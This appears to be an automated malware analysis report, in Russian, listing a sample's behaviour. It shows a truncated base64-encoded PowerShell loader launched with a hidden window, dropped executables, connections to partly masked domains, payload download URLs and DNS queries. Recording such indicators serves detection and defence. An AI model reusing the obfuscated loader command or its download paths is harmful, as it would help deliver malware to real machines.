Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABHAHkAZwBwAG8AaAA1AD0AKAAnAE8AYQAnACsAJwBzACcAKwAoACcAaQAnACsAJwBzADMAcAAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAGUAUgBwAFIAbwBGAEkATABlAFwAVwBjADUAUwB1A...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
- %TEMP%\733766.cvr
- %HOMEPATH%\wc5suwd\ijzerld\f1rxg4v7.exe
- %HOMEPATH%\wc5suwd\ijzerld\f1rxg4v7.exe
- 'cu##el.com':443
- 'fr####iritmind.com':80
- 'cr####cksusa.com':80
- 'do####niverse.com':80
- 'id###oft.com':443
- 'x1.#.lencr.org':80
- http://fr####iritmind.com/MASD/HowTo/css/J/
- http://fr####iritmind.com/cgi-sys/suspendedpage.cgi
- http://cr####cksusa.com/wp-content/NJ/
- http://cr####cksusa.com/cgi-sys/suspendedpage.cgi
- http://www.do####niverse.com/pics/yL8/
- http://x1.#.lencr.org/
- 'id###oft.com':443
- DNS ASK zp####hopping.com
- DNS ASK cu##el.com
- DNS ASK fr####iritmind.com
- DNS ASK cr####cksusa.com
- DNS ASK do####niverse.com
- DNS ASK id###oft.com
- DNS ASK x1.#.lencr.org
- DNS ASK gu###smart.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABHAHkAZwBwAG8AaAA1AD0AKAAnAE8AYQAnACsAJwBzACcAKwAoACcAaQAnACsAJwBzADMAcAAnACkAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAGUAUgBwAFIAbwBGAEkATABlAFwAVwBjADUAUwB1A... (со скрытым окном)